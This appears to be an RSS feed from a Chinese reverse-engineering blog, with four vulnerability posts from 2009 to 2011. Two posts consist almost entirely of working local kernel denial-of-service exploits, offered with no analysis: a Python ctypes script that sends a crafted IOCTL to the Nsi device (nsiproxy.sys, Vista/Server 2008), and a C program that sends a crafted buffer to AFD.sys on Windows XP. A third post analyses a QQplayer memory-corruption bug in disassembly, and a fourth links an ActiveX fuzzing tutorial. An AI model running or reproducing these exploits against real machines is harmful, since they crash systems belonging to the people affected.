<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>SoftRCE.net &#187; 漏洞</title>
	<atom:link href="http://www.softrce.net/archives/tag/%e6%bc%8f%e6%b4%9e/feed" rel="self" type="application/rss+xml" />
	<link>http://www.softrce.net</link>
	<description>Software Reverse Code Engineering</description>
	<lastBuildDate>Tue, 13 Sep 2011 06:58:40 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.2.1</generator>
		<item>
		<title>Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</title>
		<link>http://www.softrce.net/archives/392</link>
		<comments>http://www.softrce.net/archives/392#comments</comments>
		<pubDate>Wed, 18 May 2011 07:40:11 +0000</pubDate>
		<dc:creator>dge</dc:creator>
				<category><![CDATA[倚天屠龙（Vulnerability）]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.softrce.net/?p=392</guid>
		<description><![CDATA[#!/usr/bin/python from ctypes import * kernel32 = windll.kernel32 Psapi    = windll.Psapi if __name__ == &#8216;__main__&#8217;: GENERIC_READ  = 0&#215;80000000 GENERIC_WRITE = 0&#215;40000000 OPEN_EXISTING = 0&#215;3 CREATE_ALWAYS = 0&#215;2 SYM_NAME   = “\\\\.\\Nsi” dwReturn      = c_ulong() out_buff      = ” in_buff       = (“\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00&#8243; “\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00&#8243; “\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00&#8243; “\x38\xfa\x78\x00\x0c\x00\x00\x00&#8243;) handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ &#124; GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None) dev_ioct = kernel32.DeviceIoControl(handle, [...]]]></description>
			<content:encoded><![CDATA[<p>#!/usr/bin/python<br />
from ctypes import *</p>
<p>kernel32 = windll.kernel32<span id="more-392"></span><br />
Psapi    = windll.Psapi</p>
<p>if __name__ == &#8216;__main__&#8217;:<br />
GENERIC_READ  = 0&#215;80000000<br />
GENERIC_WRITE = 0&#215;40000000<br />
OPEN_EXISTING = 0&#215;3<br />
CREATE_ALWAYS = 0&#215;2</p>
<p>SYM_NAME   = “\\\\.\\Nsi”<br />
dwReturn      = c_ulong()<br />
out_buff      = ”<br />
in_buff       = (“\x00\x00\x00\x00\x00\x00\x00\x00\xec\x2d\x39\x6e\x07\x00\x00\x00&#8243;<br />
“\x01\x00\x00\x00\x00\x00\x00\x00\x38\x89\x6c\x01\x08\x00\x00\x00&#8243;<br />
“\x00\x00\x00\x00\x00\x00\x00\x00\x10\xfa\x78\x00\x28\x00\x00\x00&#8243;<br />
“\x38\xfa\x78\x00\x0c\x00\x00\x00&#8243;)</p>
<p>handle = kernel32.CreateFileA(SYM_NAME, GENERIC_READ | GENERIC_WRITE,0, None, CREATE_ALWAYS, 0, None)<br />
dev_ioct = kernel32.DeviceIoControl(handle, 0x12003f, in_buff,len(in_buff), out_buff, len(out_buff),byref(dwReturn), None)</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://www.softrce.net/archives/381" rel="bookmark" title="Permanent Link: Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability">Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability</a></li><li><a href="http://www.softrce.net/archives/405" rel="bookmark" title="Permanent Link: Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)">Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)</a></li><li><a href="http://www.softrce.net/archives/19" rel="bookmark" title="Permanent Link: [转载]在英特尔软件网络博客上看到的">[转载]在英特尔软件网络博客上看到的</a></li></ul><hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> 8e761b2ea8edc3ca311452b020051837)</small><h3  class="related_post_title">相关阅读</h3><ul class="related_post"><li>2011年04月8日 -- <a href="http://www.softrce.net/archives/381" title="Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability">Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability</a></li><li>2011年03月21日 -- <a href="http://www.softrce.net/archives/369" title="QQplayer Memory Corruption Vulnerability">QQplayer Memory Corruption Vulnerability</a></li><li>2009年05月15日 -- <a href="http://www.softrce.net/archives/136" title="ActiveX 控件组件的Fuzz和利用">ActiveX 控件组件的Fuzz和利用</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.softrce.net/archives/392/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability</title>
		<link>http://www.softrce.net/archives/381</link>
		<comments>http://www.softrce.net/archives/381#comments</comments>
		<pubDate>Fri, 08 Apr 2011 03:04:58 +0000</pubDate>
		<dc:creator>dge</dc:creator>
				<category><![CDATA[倚天屠龙（Vulnerability）]]></category>
		<category><![CDATA[windows xp]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.softrce.net/?p=381</guid>
		<description><![CDATA[//////////////////////////////////////////////////////////////////////////// // // Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit // ///////////////////////////////////////////////////////////////////////////// #include &#60;stdio.h&#62; #include &#60;Winsock2.h&#62; #pragma comment (lib, “ws2_32.lib”) BYTE buf[]={ 0xac,0xfd,0xd3,0&#215;00,0&#215;01,0&#215;00,0&#215;00,0&#215;00,0&#215;00,0&#215;00, 0&#215;00,0&#215;00,0&#215;20,0&#215;00,0&#215;00,0&#215;00,0xe8,0xfd,0xd3,0&#215;00, 0xb8,0xfd,0xd3,0&#215;00,0xf8,0xfd,0xd3,0&#215;00,0xc4,0xfd, 0xd3,0&#215;00,0xcc,0xfd,0xd3,0&#215;00}; int main( ) { WSADATA ws; SOCKET tcp_socket; struct sockaddr_in peer; ULONG  dwReturnSize; printf(“\n Microsoft Windows xp AFD.sys Local Kernel DoS Exploit \n\n”); printf(“\t Create by Lufeng [...]]]></description>
			<content:encoded><![CDATA[<p>////////////////////////////////////////////////////////////////////////////<br />
//<br />
// Title: Microsoft Windows xp AFD.sys Local Kernel DoS Exploit<br />
//<br />
/////////////////////////////////////////////////////////////////////////////<span id="more-381"></span></p>
<p>#include &lt;stdio.h&gt;<br />
#include &lt;Winsock2.h&gt;</p>
<p>#pragma comment (lib, “ws2_32.lib”)</p>
<p>BYTE buf[]={<br />
0xac,0xfd,0xd3,0&#215;00,0&#215;01,0&#215;00,0&#215;00,0&#215;00,0&#215;00,0&#215;00,<br />
0&#215;00,0&#215;00,0&#215;20,0&#215;00,0&#215;00,0&#215;00,0xe8,0xfd,0xd3,0&#215;00,<br />
0xb8,0xfd,0xd3,0&#215;00,0xf8,0xfd,0xd3,0&#215;00,0xc4,0xfd,<br />
0xd3,0&#215;00,0xcc,0xfd,0xd3,0&#215;00};</p>
<p>int main( )<br />
{<br />
WSADATA ws;</p>
<p>SOCKET tcp_socket;<br />
struct sockaddr_in peer;<br />
ULONG  dwReturnSize;</p>
<p>printf(“\n Microsoft Windows xp AFD.sys Local Kernel DoS Exploit \n\n”);<br />
printf(“\t Create by Lufeng Li of Neusoft Corporation. \n\n”);</p>
<p>WSAStartup(0&#215;0202,&amp;ws);</p>
<p>peer.sin_family = AF_INET;<br />
peer.sin_port = htons( 0x01bd );<br />
peer.sin_addr.s_addr = inet_addr( “127.0.0.1&#8243; );</p>
<p>tcp_socket = socket(AF_INET, SOCK_DGRAM, 0);//SOCK_DGRAM</p>
<p>if ( connect(tcp_socket, (struct sockaddr*) &amp;peer, sizeof(struct sockaddr_in)) )<br />
{<br />
printf(“connect error\n”);<br />
exit(0);<br />
}</p>
<p>DeviceIoControl( (HANDLE)tcp_socket,0x000120cf, buf,0&#215;24,buf,0&#215;24,&amp;dwReturnSize, NULL);</p>
<p>return TRUE;<br />
}</p>
<hr /><h2>Comments</h2><ul><li><a href="http://www.softrce.net/archives/381">2011年04月22日</a>, gz1x writes: AFD里问题很多，不仅仅是Dos，可以本地提权。</li><li><a href="http://www.softrce.net/archives/381">2011年04月23日</a>, dge writes: @gz1x, 搞afd搞了一段时间了，到现在为止只弄出来这个，还得努力啊。</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://www.softrce.net/archives/405" rel="bookmark" title="Permanent Link: Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)">Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)</a></li><li><a href="http://www.softrce.net/archives/392" rel="bookmark" title="Permanent Link: Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability">Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</a></li><li><a href="http://www.softrce.net/archives/96" rel="bookmark" title="Permanent Link: 暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞">暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞</a></li></ul><hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> 8e761b2ea8edc3ca311452b020051837)</small><h3  class="related_post_title">相关阅读</h3><ul class="related_post"><li>2011年05月18日 -- <a href="http://www.softrce.net/archives/392" title="Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability">Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</a></li><li>2011年03月21日 -- <a href="http://www.softrce.net/archives/369" title="QQplayer Memory Corruption Vulnerability">QQplayer Memory Corruption Vulnerability</a></li><li>2009年05月15日 -- <a href="http://www.softrce.net/archives/136" title="ActiveX 控件组件的Fuzz和利用">ActiveX 控件组件的Fuzz和利用</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.softrce.net/archives/381/feed</wfw:commentRss>
		<slash:comments>2</slash:comments>
		</item>
		<item>
		<title>QQplayer Memory Corruption Vulnerability</title>
		<link>http://www.softrce.net/archives/369</link>
		<comments>http://www.softrce.net/archives/369#comments</comments>
		<pubDate>Mon, 21 Mar 2011 02:58:19 +0000</pubDate>
		<dc:creator>dge</dc:creator>
				<category><![CDATA[倚天屠龙（Vulnerability）]]></category>
		<category><![CDATA[QQplayer]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.softrce.net/?p=369</guid>
		<description><![CDATA[QQplayer Memory Corruption Vulnerability

影响版本：&#60;= QQplayer 2.8

一个符号扩展的问题出现在MP4Splitter.dll中。]]></description>
			<content:encoded><![CDATA[<p>影响版本：&lt;= QQplayer 2.8</p>
<p>一个符号扩展的问题出现在MP4Splitter.dll中。<span id="more-369"></span></p>
<p>.text:10023EFF                 mov     eax, [esi]<br />
.text:10023F01                 push    0<br />
.text:10023F03                 push    20h<br />
.text:10023F05                 lea     ecx, [esp+40h+buff]<br />
.text:10023F09                 push    ecx<br />
.text:10023F0A                 mov     edx, [eax+0Ch]<br />
.text:10023F0D                 mov     ecx, esi<br />
.text:10023F0F                 call    edx                  ;从文件获取数据。<br />
.text:10023F11                 movsx   eax, [esp+38h+buff]  ;符号扩展产生一个类似0xFFFFFFFX的值。<br />
.text:10023F16                 cmp     eax, 20h<br />
.text:10023F19                 jge     short loc_10023F2E   ;检查被绕过<br />
.text:10023F1B                 mov     [esp+eax+38h+buf], 0 ;恶意数据被用于指针操作，导致栈中的指针数据被破坏。<br />
.text:10023F20                 lea     eax, [esp+38h+buf]<br />
.text:10023F24                 push    eax<br />
.text:10023F25                 lea     ecx, [edi+5Ch]</p>
<p>POC:不放了。</p>
<hr /><h2>Related posts:</h2><ul><li><a href="http://www.softrce.net/archives/14" rel="bookmark" title="Permanent Link: Vista Bootmgr/Winload使用的大部分选项ID">Vista Bootmgr/Winload使用的大部分选项ID</a></li><li><a href="http://www.softrce.net/archives/392" rel="bookmark" title="Permanent Link: Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability">Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</a></li><li><a href="http://www.softrce.net/archives/405" rel="bookmark" title="Permanent Link: Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)">Microsoft Windows NDISTAPI本地权限提升漏洞（MS11-062)</a></li></ul><hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> 8e761b2ea8edc3ca311452b020051837)</small>  
<div class="wp_license">
<p><a rel="license" href="http://creativecommons.org/licenses/by/3.0/"><img src="http://i.creativecommons.org/l/by/3.0//88x31.png" alt="Creative Commons Attribution 3.0 Unported" class="alignleft" style="margin-top:4px;" />
</a>This work  is licensed under a <a rel="license" href="http://creativecommons.org/licenses/by/3.0/">Creative Commons Attribution 3.0 Unported</a>.</p>
</div><h3  class="related_post_title">相关阅读</h3><ul class="related_post"><li>2011年05月18日 -- <a href="http://www.softrce.net/archives/392" title="Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability">Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</a></li><li>2011年04月8日 -- <a href="http://www.softrce.net/archives/381" title="Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability">Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability</a></li><li>2009年05月15日 -- <a href="http://www.softrce.net/archives/136" title="ActiveX 控件组件的Fuzz和利用">ActiveX 控件组件的Fuzz和利用</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.softrce.net/archives/369/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>ActiveX 控件组件的Fuzz和利用</title>
		<link>http://www.softrce.net/archives/136</link>
		<comments>http://www.softrce.net/archives/136#comments</comments>
		<pubDate>Thu, 14 May 2009 19:36:28 +0000</pubDate>
		<dc:creator>caterqiu</dc:creator>
				<category><![CDATA[倚天屠龙（Vulnerability）]]></category>
		<category><![CDATA[ActiveX]]></category>
		<category><![CDATA[Fuzz]]></category>
		<category><![CDATA[控件]]></category>
		<category><![CDATA[漏洞]]></category>

		<guid isPermaLink="false">http://www.softrce.net/archives/136</guid>
		<description><![CDATA[前几天暴风影音的那个0day也跟了下 当然以我技术，那肯定是没有跟出来了 这也注定，俺不适合搞技术 漏洞挖掘时一门严谨的科学，需要的知识经验太多了 最近也有一个朋友加我和我交流溢出程序的编写和利用 再说下Cater 不只是一个传说，请大哥们放过我吧。 郑重申明下 1、我已经该行做了水果渠道，工作已经不是搞IT的了 2、我也不是什么黑客，我没法和YingCracker这等牛比人 3、我不否认我在某人心中是个坏人，尽管我还没有伤害到她 4、我只用过Cater，caterqiu，老黄牛这些ID，我只是小打小闹搞了搞技术，我只是一个迷途小子。 丢出最后一篇技术的文章 纪念下，当年学习 ActiveX控件的漏洞Fuzz和漏洞利用学习的往事 希望错恋上 Cater 的朋友不联系搞坏事。 &#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211; 2009年，我的目标是好好整理思绪和经历好好做事。 送上我的最后一篇有关技术的文档，来告别江湖上的三位大哥 K头、K少、老k www.caterqiu.cn/UPLOAD/2009/5/ActiveX_And_Fuzz_Tutorial.By.Cater.Qiu.rar PassWord:WwW.CaterQiu.Cn From:CaterQiu&#8217;s Blog Link:http://www.caterqiu.cn/Article/ActiveX_Fuzz_And_Tutorial_By_CaterQiu.html Blog:WwW.CaterQiu.Cn E-Mail:Cater.Qiu@Gmail.CoM Date:May 15 ,2009 Comments2009年05月15日, robinh00d writes: 支持cater2009年05月15日, root writes: 人怕出名猪怕壮。 游戏该玩还得玩，换个方法玩就是了。2009年05月15日, cater writes: …我出毛毛名哦。 其实写点东西到处发发主要还是想让自己的心得被人分享呗 写的大多是简单的入门教程 哎，我想要月收入一万五，只可惜我不是什么美女YingCracker。2009年05月15日, robinh00d writes: 以前用过comraider~2009年05月15日, ayarei writes: @cater, 技术性美男吧，恩Related posts:暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞中国游戏中心游戏大厅ActiveX远程栈溢出漏洞暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞Copyright &#169; 2008 This feed is for personal, non-commercial use only. [...]]]></description>
			<content:encoded><![CDATA[<p>前几天暴风影音的那个0day也跟了下<br />
当然以我技术，那肯定是没有跟出来了<br />
这也注定，俺不适合搞技术</p>
<p>漏洞挖掘时一门严谨的科学，需要的知识经验太多了<br />
最近也有一个朋友加我和我交流溢出程序的编写和利用</p>
<p>再说下Cater 不只是一个传说，请大哥们放过我吧。<br />
<span id="more-136"></span><br />
郑重申明下<br />
1、我已经该行做了水果渠道，工作已经不是搞IT的了<br />
2、我也不是什么黑客，我没法和YingCracker这等牛比人<br />
3、我不否认我在某人心中是个坏人，尽管我还没有伤害到她<br />
4、我只用过Cater，caterqiu，老黄牛这些ID，我只是小打小闹搞了搞技术，我只是一个迷途小子。</p>
<p>丢出最后一篇技术的文章 纪念下，当年学习 ActiveX控件的漏洞Fuzz和漏洞利用学习的往事<br />
希望错恋上 Cater 的朋友不联系搞坏事。</p>
<p>&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8212;&#8211;</p>
<p>2009年，我的目标是好好整理思绪和经历好好做事。</p>
<p>送上我的最后一篇有关技术的文档，来告别江湖上的三位大哥 K头、K少、老k</p>
<p>www.caterqiu.cn/UPLOAD/2009/5/ActiveX_And_Fuzz_Tutorial.By.Cater.Qiu.rar<br />
PassWord:WwW.CaterQiu.Cn</p>
<p>From:CaterQiu&#8217;s Blog<br />
Link:http://www.caterqiu.cn/Article/ActiveX_Fuzz_And_Tutorial_By_CaterQiu.html</p>
<p>Blog:WwW.CaterQiu.Cn<br />
E-Mail:Cater.Qiu@Gmail.CoM<br />
Date:May 15 ,2009</p>
<hr /><h2>Comments</h2><ul><li><a href="http://www.softrce.net/archives/136">2009年05月15日</a>, robinh00d writes: 支持cater</li><li><a href="http://www.softrce.net/archives/136">2009年05月15日</a>, root writes: 人怕出名猪怕壮。
游戏该玩还得玩，换个方法玩就是了。</li><li><a href="http://www.softrce.net/archives/136">2009年05月15日</a>, <a href='http://www.caterqiu.cn' rel='external nofollow' class='url'>cater</a> writes: …我出毛毛名哦。
其实写点东西到处发发主要还是想让自己的心得被人分享呗
写的大多是简单的入门教程

哎，我想要月收入一万五，只可惜我不是什么美女YingCracker。</li><li><a href="http://www.softrce.net/archives/136">2009年05月15日</a>, robinh00d writes: 以前用过comraider~</li><li><a href="http://www.softrce.net/archives/136">2009年05月15日</a>, ayarei writes: @cater, 技术性美男吧，恩</li></ul><hr /><h2>Related posts:</h2><ul><li><a href="http://www.softrce.net/archives/100" rel="bookmark" title="Permanent Link: 暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞">暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞</a></li><li><a href="http://www.softrce.net/archives/83" rel="bookmark" title="Permanent Link: 中国游戏中心游戏大厅ActiveX远程栈溢出漏洞">中国游戏中心游戏大厅ActiveX远程栈溢出漏洞</a></li><li><a href="http://www.softrce.net/archives/96" rel="bookmark" title="Permanent Link: 暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞">暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞</a></li></ul><hr /><small>Copyright &copy; 2008<br /> This feed is for personal, non-commercial use only. <br /> The use of this feed on other websites breaches copyright. If this content is not in your news reader, it makes the page you are viewing an infringement of the copyright. (Digital Fingerprint:<br /> 8e761b2ea8edc3ca311452b020051837)</small><h3  class="related_post_title">相关阅读</h3><ul class="related_post"><li>2011年05月18日 -- <a href="http://www.softrce.net/archives/392" title="Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability">Microsoft Windows Vista/Server 2008 “nsiproxy.sys” Local Kernel DoS Vulnerability</a></li><li>2011年04月8日 -- <a href="http://www.softrce.net/archives/381" title="Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability">Microsoft Windows xp AFD.sys Local Kernel DoS Vulnerability</a></li><li>2011年03月21日 -- <a href="http://www.softrce.net/archives/369" title="QQplayer Memory Corruption Vulnerability">QQplayer Memory Corruption Vulnerability</a></li><li>2009年05月1日 -- <a href="http://www.softrce.net/archives/100" title="暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞">暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞</a></li><li>2009年05月1日 -- <a href="http://www.softrce.net/archives/96" title="暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞">暴风影音2009(mps.dll)ActiveX远程栈溢出漏洞</a></li><li>2009年04月30日 -- <a href="http://www.softrce.net/archives/83" title="中国游戏中心游戏大厅ActiveX远程栈溢出漏洞">中国游戏中心游戏大厅ActiveX远程栈溢出漏洞</a></li></ul>]]></content:encoded>
			<wfw:commentRss>http://www.softrce.net/archives/136/feed</wfw:commentRss>
		<slash:comments>5</slash:comments>
		</item>
	</channel>
</rss>

